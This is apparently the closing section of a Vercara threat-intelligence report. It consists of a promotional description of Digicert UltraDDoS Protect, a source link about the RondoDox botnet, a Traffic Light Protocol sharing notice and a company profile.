(TLP: CLEAR) Digicert: Digicert UltraDDoS Protect provides flexible, automated, and always-on protection across 15 Points of Presence (PoPs) and >15Tbps of DDoS mitigation capacity to enable customer availability and performance under even the largest and most complex DDoS attacks (layer 3 through layer 7). An automated intelligence feed that is constantly updating mitigation devices allows protection against emerging attack vectors and common attack sources.
Source: https://thehackernews.com/2025/07/rondodox-botnet-exploits-flaws-in-tbk.html
Traffic Light Protocol (TLP)
Except where noted, this report is released as TLP: CLEAR and items in it may be shared but not attributed to Vercara. For more information on the Traffic Light Protocol, the definitions and usage are at https://www.first.org/tlp/.
About Vercara
The world’s top brands depend on Vercara to safeguard their digital infrastructure and online presence. Vercara offers a suite of cloud-delivered services that are always secure, reliable, and available and enable global businesses to thrive online. UltraSecure protects organizations’ networks and applications against risks and downtime, ensuring that businesses and their customers enjoy exceptional and uninterrupted interactions all day, every day. Delivering the industry’s best performance and always-on service, Vercara’s mission-critical security portfolio provides best-in-class DNS, application, and network security, including DDoS, WAF, and Bot management services to its global 5000 customers and beyond.
To learn more about Vercara solutions, please contact us.